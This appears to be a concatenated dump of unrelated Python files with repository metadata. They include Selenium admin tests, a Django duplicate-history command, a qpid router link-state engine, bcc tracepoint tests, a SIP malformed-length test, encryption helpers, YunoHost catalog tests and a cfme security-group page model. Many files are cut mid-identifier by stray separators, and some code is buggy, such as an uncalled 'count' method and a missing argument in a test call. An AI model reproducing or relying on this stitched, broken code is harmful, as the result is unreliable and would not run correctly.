class CMNetworksTests(WiTestCase, unittest.TestCase):
@staticmethod
def _test_add_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tfoot/tr/td/ul/li/a", ["Add pool"])
driver.find_element_by_link_text("Add pool").click()
self.wait_for_text("//div[@id='dialog-div']/form/div/fieldset/div/span", ["Pool address"])
driver.find_element_by_id("id_address").clear()
driver.find_element_by_id("id_address").send_keys("10.10.127.0")
driver.find_element_by_id("id_mask").clear()
driver.find_element_by_id("id_mask").send_keys("24")
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully added a pool."])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_unlock_pool(self):
drive
|
r = self.driver
self.base_url =
|
self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Unlock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to unlock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully unlocked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def _test_lock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Lock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to lock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully locked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_delete_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Delete")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to delete pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully deleted pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def test_1_simple(self):
self._test_add_pool(self)
self._test_lock_pool()
self._test_unlock_pool(self)
self._test_delete_pool(self)
|
michaelkuty/python-app-loader
|
tests/testapp1/urls.py
|
Python
|
bsd-3-clause
| 73 | 0 |
from app_loade
|
r import app_loader
urlpatterns = app_loader.urlpatt
|
erns
|
haystack/eyebrowse-server
|
common/management/commands/remove_duplicate_history.py
|
Python
|
mit
| 949 | 0 |
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from api.models import EyeHistory
class Command(NoArgsCommand):
help = 'Detects and removes duplicated history entries'
def handle(self, **options):
self.stdout.write('Beginning update...\n')
users = User.objects.all()
for user in users:
self._delete_dup_history(user)
self.stdout.write('Update complete.\n')
def _delete_dup_history(self, user):
items = EyeHistory.objects.filter(user=user)
for item in items:
objs = EyeHistory.objects.filter(
user=user, url=item.url,
domain=item.domain, title=item.title,
total_time=item.total_time, src=item.src)
if objs.count > 1:
for obj in objs[1:]:
sel
|
f.stdout.write('Deletin
|
g: %s\n' % item)
obj.delete()
|
ChugR/qpid-dispatch
|
python/qpid_dispatch_internal/router/link.py
|
Python
|
apache-2.0
| 3,006 | 0.002329 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contribu
|
tor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required b
|
y applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from .data import MessageRA, MessageLSU, MessageLSR
from ..dispatch import LOG_TRACE
class LinkStateEngine:
"""
This module is responsible for running the Link State protocol.
"""
def __init__(self, container):
self.container = container
self.node_tracker = container.node_tracker
self.id = self.container.id
self.ra_interval_stable = self.container.config.raIntervalSeconds
self.ra_interval_flux = self.container.config.raIntervalFluxSeconds
self.last_ra_time = 0
self.mobile_seq = 0
def set_mobile_seq(self, mobile_seq):
self.mobile_seq = mobile_seq
def tick(self, now):
interval = self.ra_interval_stable
if self.node_tracker.in_flux_mode(now):
interval = self.ra_interval_flux
if now - self.last_ra_time >= interval:
self.send_ra(now)
def handle_ra(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.ra_received(msg.id, msg.version, msg.ls_seq, msg.mobile_seq, msg.instance, now)
def handle_lsu(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.link_state_received(msg.id, msg.version, msg.ls, msg.instance, now)
def handle_lsr(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.router_learned(msg.id, msg.version)
my_ls = self.node_tracker.link_state
smsg = MessageLSU(None, self.id, my_ls.ls_seq, my_ls, self.container.instance)
self.container.send('amqp:/_topo/%s/%s/qdrouter' % (msg.area, msg.id), smsg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % smsg)
def send_lsr(self, _id):
msg = MessageLSR(None, self.id)
self.container.send('amqp:/_topo/0/%s/qdrouter' % _id, msg)
self.container.log_ls(LOG_TRACE, "SENT: %r to: %s" % (msg, _id))
def send_ra(self, now):
self.last_ra_time = now
ls_seq = self.node_tracker.link_state.ls_seq
msg = MessageRA(None, self.id, ls_seq, self.mobile_seq, self.container.instance)
self.container.send('amqp:/_topo/0/all/qdrouter', msg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % msg)
|
toomoresuch/pysonengine
|
parts/gaeunit/sample_app/model.py
|
Python
|
mit
| 92 | 0.021739 |
from google.app
|
engine.ext import db
class MyEntity(db.Model):
name = db.StringPropert
|
y()
|
shodoco/bcc
|
tests/python/test_tracepoint.py
|
Python
|
apache-2.0
| 2,128 | 0.00282 |
#!/usr/bin/env python
# Copyright (c) Sasha Goldshtein
# Licensed under the Apache License, Version 2.0 (the "License")
import bcc
import unittest
from time import sleep
import distutils.version
import os
import subprocess
def kernel_version_ge(major, minor):
# True if running kernel is >= X.Y
version = distutils.version.LooseVersion(os.uname()[2]).version
if version[0] > major:
return True
if version[0] < major:
retur
|
n False
if minor and version[1] < minor:
return False
return True
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepoint(unittest.TestCase):
def test_tracepoint(self):
text = """
BPF_HASH(switches
|
, u32, u64);
TRACEPOINT_PROBE(sched, sched_switch) {
u64 val = 0;
u32 pid = args->next_pid;
u64 *existing = switches.lookup_or_init(&pid, &val);
(*existing)++;
return 0;
}
"""
b = bcc.BPF(text=text)
sleep(1)
total_switches = 0
for k, v in b["switches"].items():
total_switches += v.value
self.assertNotEqual(0, total_switches)
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepointDataLoc(unittest.TestCase):
def test_tracepoint_data_loc(self):
text = """
struct value_t {
char filename[64];
};
BPF_HASH(execs, u32, struct value_t);
TRACEPOINT_PROBE(sched, sched_process_exec) {
struct value_t val = {0};
char fn[64];
u32 pid = args->pid;
struct value_t *existing = execs.lookup_or_init(&pid, &val);
TP_DATA_LOC_READ_CONST(fn, filename, 64);
__builtin_memcpy(existing->filename, fn, 64);
return 0;
}
"""
b = bcc.BPF(text=text)
subprocess.check_output(["/bin/ls"])
sleep(1)
self.assertTrue("/bin/ls" in [v.filename.decode()
for v in b["execs"].values()])
if __name__ == "__main__":
unittest.main()
|
ezigman/sftf
|
UserAgentBasicTestSuite/case207.py
|
Python
|
gpl-2.0
| 3,360 | 0.018155 |
#
# Copyright (C) 2004 SIPfoundry Inc.
# Licensed by SIPfoundry under the GPL license.
#
# Copyright (C) 2004 SIP Forum
# Licensed to SIPfoundry under a Contributor Agreement.
#
#
# This file is part of SIP Forum User Agent Basic Test Suite which
# belongs to the SIP Forum Test Framework.
#
# SIP Forum User Agent Basic Test Suite is free software; you can
# redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# SIP Forum User Agent Basic Test Suite is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SIP Forum User Agent Basic Test Suite; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# $Id: case207.py,v 1.2 2004/05/02 18:57:35 lando Exp $
#
from TestCase import TestCase
import NetworkEventHandler as NEH
import Log
class case207 (TestCase):
def config(self):
self.name = "Case 207"
self.description = "Content length larger than message"
self.isClient = True
self.transport = "UDP"
def run(self):
self.neh = NEH.NetworkEventHandler(self.transport)
inv = s
|
elf.createRequest("INVITE")
cl = inv.getParsedHeaderValue("Content-Length")
cl.length = 9999
inv.setHeaderValue("Content-Length", cl.create())
self.writeMessageToNetwork(self.neh, inv)
self.code = 0
while (self.code <= 200):
repl = self.readReplyFromNetwork(self.neh)
if (repl
|
is not None) and (repl.code > self.code):
self.code = repl.code
elif repl is None:
self.code = 999
if repl is None:
self.addResult(TestCase.TC_FAILED, "missing reply on request")
self.neh.closeSock()
def onDefaultCode(self, message):
if message.code > self.code:
self.code = message.code
if message.code >= 200:
if message.getParsedHeaderValue("CSeq").method == "INVITE":
Log.logDebug("case207: sending ACK for >= 200 reply", 3)
ack = self.createRequest("ACK", trans=message.transaction)
self.writeMessageToNetwork(self.neh, ack)
if message.code == 400:
self.addResult(TestCase.TC_PASSED, "INVITE rejected with 400")
elif message.code == 200:
if message.transaction.canceled:
Log.logDebug("case207: received 200 for CANCEL", 3)
else:
Log.logDebug("case207: sending BYE for accepted INVITE", 3)
bye = self.createRequest("BYE", dia=message.transaction.dialog)
self.writeMessageToNetwork(self.neh, bye)
rep = self.readReplyFromNetwork(self.neh)
if rep is None:
self.addResult(TestCase.TC_ERROR, "missing response on BYE")
elif message.code != 487:
self.addResult(TestCase.TC_FAILED, "INVITE rejected, but not with 400")
else:
self.addResult(TestCase.TC_FAILED, "INVITE accepted, not rejected with 400")
can = self.createRequest("CANCEL", trans=message.transaction)
message.transaction.canceled = True
self.writeMessageToNetwork(self.neh, can)
canrepl = self.readReplyFromNetwork(self.neh)
if canrepl is None:
self.addResult(TestCase.TC_ERROR, "missing 200 on CANCEL")
|
Leits/openprocurement.api.encryprion
|
openprocurement/api/encryprion/utils.py
|
Python
|
apache-2.0
| 1,144 | 0 |
import libnacl.secret
import libnacl.utils
from StringIO import
|
StringIO
from .response import FileObjResponse
from pyramid.httpexceptions import HTTPBadRequest
def generate_secret_key():
return libnacl.utils.salsa_key().encode('hex')
def encrypt_file(key, fileobj, nonce=None)
|
:
if nonce is None:
nonce = libnacl.utils.rand_nonce()
box = libnacl.secret.SecretBox(key.decode('hex'))
encrypted = box.encrypt(fileobj.read(), nonce)
return StringIO(encrypted)
def decrypt_file(key, fileobj):
box = libnacl.secret.SecretBox(key.decode('hex'))
decrypted = box.decrypt(fileobj.read())
return StringIO(decrypted)
def validate_key(view_callable):
def inner(context, request):
key = request.params.get('key')
if key is None:
raise HTTPBadRequest('Key missed.')
if len(key) != 64:
raise HTTPBadRequest('The key must be exactly 32 bytes long.')
try:
key.decode('hex')
except TypeError:
raise HTTPBadRequest('Invalid key: Non-hexadecimal digit found.')
return view_callable(context, request)
return inner
|
pvarenik/PyCourses
|
allure-python-master/tests/test_attach.py
|
Python
|
gpl-2.0
| 2,550 | 0.002402 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
report = report_for("""
import pytest
import allure
def test_x():
%s.attach('Foo', 'Bar')
""" % package)
assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
report = report_for("""
import allure as A
def test_x():
A.attach('Foo', 'Bar', A.attach_type.%s)
""" % a_type)
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
@pytest.fixture
def attach_contents(self, report_for, reportdir):
"""
Fixture that returns contents of the attachment file for given attach body
"""
def impl(body):
report = report_for("""
from pytest import allure as A
def test_x():
A.attach('Foo', %s, A.attach_type.TEXT)
""" % repr(body))
filename = report.find('.//attachment').get('source')
return reportdir.join(filename).read('rb')
return impl
def test_ascii(self, attach_contents):
assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))
def test_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь').
|
decode('utf-8'), is_(u'ололо пыщьпыщь'))
def test_broken_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
def test_attach_in_fixtu
|
re_teardown(report_for):
"""
Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
"""
report = report_for("""
import pytest
@pytest.yield_fixture(scope='function')
def myfix():
yield
pytest.allure.attach('Foo', 'Bar')
def test_x(myfix):
assert True
""")
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
|
the-zebulan/CodeWars
|
katas/beta/how_sexy_is_your_name.py
|
Python
|
mit
| 566 | 0 |
SCORES = {'A': 100, 'B': 14, 'C': 9, 'D': 28, 'E': 1
|
45, 'F': 12, 'G': 3,
'H': 10, 'I': 200, 'J': 100, 'K': 114, 'L': 100, 'M': 25,
'N': 450, 'O': 80, 'P': 2, 'Q': 12, 'R': 400, 'S': 113, 'T': 405,
'U': 11, 'V': 10
|
, 'W': 10, 'X': 3, 'Y': 210, 'Z': 23}
def sexy_name(name):
name_score = sum(SCORES.get(a, 0) for a in name.upper())
if name_score >= 600:
return 'THE ULTIMATE SEXIEST'
elif name_score >= 301:
return 'VERY SEXY'
elif name_score >= 60:
return 'PRETTY SEXY'
return 'NOT TOO SEXY'
|
aaivazis/nautilus
|
tests/services/test_service.py
|
Python
|
mit
| 2,991 | 0.003678 |
# external imports
import unittest
# local imports
import nautilus
from nautilus.api.endpoints import GraphQLRequestHandler
from ..util import Mock
class TestUtil(unittest.TestCase):
def setUp(self):
# create a service without an explict name
class MyService(nautilus.Service): pass
# save the service record to the test suite
self.service = MyService
def test_has_default_name(self):
# make sure the name matches
assert self.service.name == 'myService', (
"Service did not have the correct name."
)
def test_default_name_can_have_numbers(self):
# create a service without an explict name
class TestService1(nautilus.Service): pass
# make sure the name is what we expect
assert TestService1.name == 'testService1', (
"Service did not have the correct name with number."
)
def test_can_accept_name(self):
class MyService(nautilus.Service):
name = 'foo'
assert MyService.name == 'foo', (
"Service could not recieve custom name."
)
def test_can_initialize_with_schema(self):
# create a mock schema
schema = Mock()
# make sure the internal schema is what we gave it
assert self.service(schema=schema).schema == schema, (
"Service could not be initialized with a specific schema"
)
def test_can_accept_config(self):
# create a config object
config = nautilus.Config(foo='bar')
# make sure the config is what we gave it
assert self.service(config=config).config == config, (
"Service could not be initialized with a specific config."
)
def test_can_merge_config_from_init(self):
# the config of the base class
base_config = nautilus.Config(foo='bar')
# the config to initialize with
init_config = nautilus.Config(foo='baz', wakka='flokka')
class MyConfiguredService(nautilus.Service):
config = base_config
# the mix of the two config
mix_config = base_config.copy()
mix_config.update(init_config)
assert MyConfiguredService(config=init_config).config == mix_config, (
"Service could not mix the initialized config onto the base one."
)
def test_has_request_handler(self):
# check the value of the internal attribute
assert issubclass(self.service().api_request_handler_class, GraphQLRequestHandler), (
"APIGateway did not have the
|
right request handler class"
)
def test_can_summarize(self):
# the target summary
target = {
'name': 'myService',
}
# summarize the service
summarized = self.service().summarize()
# make sure the names m
|
atch up
assert target['name'] == summarized['name'], (
"Summarzied service did not have the right name."
)
|
nickdrozd/ecio-lisp
|
fileio.py
|
Python
|
mit
| 581 | 0.003442 |
import json
from stats import read_stats
@read_stats
def read_file(file_name, default='"?"'):
try:
|
file = open(file_name, 'r')
except FileNotFoundError:
print('Creating file {}'.format(file_name))
file = open(file_name, 'w+')
file.write(default)
contents = json.loads(file.read())
file.close()
return contents
def write_file(file_name, data, indent=4):
with open(file_name, 'w
|
+') as file:
file.write(
json.dumps(
data,
sort_keys=True,
indent=indent))
|
YunoHost/moulinette-yunohost
|
src/yunohost/tests/test_appscatalog.py
|
Python
|
agpl-3.0
| 9,247 | 0.001406 |
import os
import pytest
import requests
import requests_mock
import glob
import shutil
from moulinette import m18n
from moulinette.utils.filesystem import read_json, write_to_json, write_to_yaml
from yunohost.utils.error import YunohostError
from yunohost.app import (
_initialize_apps_catalog_system,
_read_apps_catalog_list,
_update_apps_catalog,
_actual_apps_catalog_api_url,
_load_apps_catalog,
app_catalog,
logger,
APPS_CATALOG_CACHE,
APPS_CATALOG_CONF,
APPS_CATALOG_API_VERSION,
APPS_CATALOG_DEFAULT_URL,
)
APPS_CATALOG_DEFAULT_URL_FULL = _actual_apps_catalog_api_url(APPS_CATALOG_DEFAULT_URL)
DUMMY_APP_CATALOG = """{
"apps": {
"foo": {"id": "foo", "level": 4, "category": "yolo", "manifest":{"description": "Foo"}},
"bar": {"id": "bar", "level": 7, "category": "swag", "manifest":{"description": "Bar"}}
},
"categories": [
{"id": "yolo", "description": "YoLo", "title": {"en": "Yolo"}},
{"id": "swag", "description": "sWaG", "title": {"en": "Swag"}}
]
}
"""
class AnyStringWith(str):
def __eq__(self, other):
return self in other
def setup_function(function):
# Clear apps catalog cache
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
# Clear apps_catalog conf
if os.path.exists(APPS_CATALOG_CONF):
os.remove(APPS_CATALOG_CONF)
def teardown_function(function):
# Clear apps catalog cache
# Otherwise when using apps stuff after running the test,
# we'll still have the dummy unusable list
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
#
# ################################################
#
def test_apps_catalog_init(mocker):
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Conf doesn't exist yet
assert not os.path.exists(APPS_CATALOG_CONF)
# Initialize ...
mocker.spy(m18n, "n")
_initialize_apps_catalog_system()
m18n.n.assert_any_call("apps_catalog_init_success")
# And a conf with at least one list
assert os.path.exists(APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert len(apps_catalog_list)
# Cache is expected to still be empty though
# (if we did update the apps_catalog during init,
# we couldn't differentiate easily exceptions
# related to lack of network connectivity)
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
def test_apps_catalog_emptylist():
# Initialize ...
_initialize_apps_catalog_system()
# Let's imagine somebody removed the default apps catalog because uh idk they dont want to use our default apps catalog
os.system("rm %s" % APPS_CATALOG_CONF)
os.system("touch %s" % APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert not len(apps_catalog_list)
def test_apps_catalog_update_nominal(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
_actual_apps_catalog_api_url,
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_updating")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# And if we load the catalog, we sould find
# - foo and bar as apps (unordered),
# - yolo and swag as categories (ordered)
catalog = app_catalog(with_categories=True)
assert "apps" in catalog
assert set(catalog["apps"].keys()) == set(["foo", "bar"])
assert "categories" in catalog
assert [c["id"] for c in catalog["categories"]] == ["yolo", "swag"]
def test_apps_catalog_update_404(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# 404 error
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, status_code=404)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_timeout(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Timeout
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_sslerror(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# SSL error
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.SSLError
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_corrupted(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Corrupted json
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG[:-2]
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_load_with_empty_cache(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_obsolete_cache")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
|
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_conflicts_between_lists(mocker):
# Initialize ...
_initialize_apps_catalog_system()
conf = [
{"id": "default", "url": APPS_CATALOG_DEFAULT_URL},
{
"id": "default2",
"url": APPS_CATALOG_DEFAULT_URL.replace("yunohost.org", "yolohost.org"),
},
]
|
write_to_yaml(APPS_CATALOG_CONF, conf)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
# + the same apps catalog for the second list
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
m.register_uri(
"GET",
APPS_CATALOG_DEFAULT_URL_FULL.replace("yunohost.org", "yolohost.org"),
text=DUMMY_APP_CATALOG,
)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(logger, "warning")
app_dict = _load_apps_catalog()["apps"]
logger.warning.assert_any_call(AnyStringWith("Duplicate"))
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_oudated_api_version(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Update
with requests_mock.Mocker() as m:
mocker.spy(m18n, "n")
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
_update_apps_catalog()
# Cache shouldn
|
Jacques-Florence/schedSim
|
src/analysis/reward.py
|
Python
|
bsd-3-clause
| 847 | 0.022432 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import sys
import numpy
from math import floor
def movingAverage(x, N):
cumsum = numpy.cumsum(numpy.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N])/N
filename = "reports/configuration.confrewardRecordReport.txt"
if (len(sys.argv) > 1):
filename = sys.argv[1]
with open(filename) as f:
print f.readline()
time = []
temp = []
avg = []
for line in f:
entry = l
|
ine.split(":")
time.append(float(entry[0]))
temp.appen
|
d(float(entry[1]))
windowSize = 100
avg = [0] * (windowSize - 1)
avg = avg + list( movingAverage(temp, windowSize))
ratio = 0.999
avg = avg[int(floor(len(avg )*ratio)): len(avg )-1]
time = time[int(floor(len(time)*ratio)): len(time)-1]
temp = temp[int(floor(len(temp)*ratio)): len(temp)-1]
plt.plot(time, temp, 'r-')
plt.plot(time, avg, 'ro')
plt.show()
|
akarol/cfme_tests
|
cfme/cloud/security_groups.py
|
Python
|
gpl-2.0
| 8,515 | 0.001292 |
# -*- coding: utf-8 -*-
import attr
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import View, Select
from widgetastic_manageiq import (
Accordion, BaseEntitiesView, BootstrapSelect, BreadCrumb, ItemsToolBarViewSelector,
ManageIQTree, SummaryTable, Text, TextInput)
from widgetastic_patternfly import Dr
|
opdown, Bu
|
tton
from cfme.base.ui import BaseLoggedInPage
from cfme.exceptions import ItemNotFound, SecurityGroupsNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigate_to, navigator, CFMENavigateStep
from cfme.utils.blockers import BZ
from cfme.utils.wait import wait_for
class SecurityGroupToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Dropdown('Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class SecurityGroupDetailsToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Button(title='Download summary in PDF format')
class SecurityGroupDetailsAccordion(View):
@View.nested
class properties(Accordion): # noqa
tree = ManageIQTree()
@View.nested
class relationships(Accordion): # noqa
tree = ManageIQTree()
class SecurityGroupDetailsEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
properties = SummaryTable(title='Properties')
relationships = SummaryTable(title='Relationships')
smart_management = SummaryTable(title='Smart Management')
firewall_rules = SummaryTable(title="Firewall Rules")
class SecurityGroupAddEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
class SecurityGroupAddForm(View):
network_manager = BootstrapSelect(id='ems_id')
name = TextInput(name='name')
description = TextInput(name='description')
cloud_tenant = Select(name='cloud_tenant_id')
add = Button('Add')
cancel = Button('Cancel')
class SecurityGroupView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_security_groups(self):
return(
self.logged_in_as_current_user and
self.navigation.currently_selected == ['Networks', 'Security Groups'])
class SecurityGroupAllView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.title.text == 'Security Groups')
toolbar = View.nested(SecurityGroupToolbar)
including_entities = View.include(BaseEntitiesView, use_parent=True)
class SecurityGroupDetailsView(SecurityGroupView):
@property
def is_displayed(self):
expected_title = '{} (Summary)'.format(self.context['object'].name)
return (
self.in_security_groups and
self.entities.title.text == expected_title and
self.entities.breadcrumb.active_location == expected_title)
toolbar = View.nested(SecurityGroupDetailsToolbar)
sidebar = View.nested(SecurityGroupDetailsAccordion)
entities = View.nested(SecurityGroupDetailsEntities)
class SecurityGroupAddView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.breadcrumb.active_location == 'Add New Security Group' and
self.entities.title.text == 'Add New Security Group')
entities = View.nested(SecurityGroupAddEntities)
form = View.nested(SecurityGroupAddForm)
@attr.s
class SecurityGroup(BaseEntity):
""" Automate Model page of SecurityGroup
Args:
provider (obj): Provider name for Network Manager
name(str): name of the Security Group
description (str): Security Group description
"""
_param_name = "SecurityGroup"
name = attr.ib()
provider = attr.ib()
description = attr.ib(default="")
def refresh(self):
self.provider.refresh_provider_relationships()
self.browser.refresh()
def delete(self, cancel=False, wait=False):
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select('Delete this Security Group',
handle_alert=(not cancel))
# cancel doesn't redirect, confirmation does
view.flush_widget_cache()
if not cancel:
view = self.create_view(SecurityGroupAllView)
view.is_displayed
view.flash.assert_success_message('Delete initiated for 1 Security Group.')
if wait:
wait_for(
lambda: self.name in view.entities.all_entity_names,
message="Wait Security Group to disappear",
fail_condition=True,
num_sec=500,
timeout=1000,
delay=20,
fail_func=self.refresh
)
@property
def exists(self):
try:
navigate_to(self, 'Details')
except SecurityGroupsNotFound:
return False
else:
return True
@attr.s
class SecurityGroupCollection(BaseCollection):
""" Collection object for the :py:class: `cfme.cloud.SecurityGroup`. """
ENTITY = SecurityGroup
def create(self, name, description, provider, cancel=False, wait=False):
"""Create new Security Group.
Args:
provider (obj): Provider name for Network Manager
name (str): name of the Security Group
description (str): Security Group description
cancel (boolean): Cancel Security Group creation
wait (boolean): wait if Security Group created
"""
view = navigate_to(self, 'Add')
changed = view.form.fill({'network_manager': "{} Network Manager".format(provider.name),
'name': name,
'description': description,
'cloud_tenant': 'admin'})
if cancel and changed:
view.form.cancel.click()
flash_message = 'Add of new Security Group was cancelled by the user'
else:
view.form.add.click()
flash_message = 'Security Group "{}" created'.format(name)
# add/cancel should redirect, new view
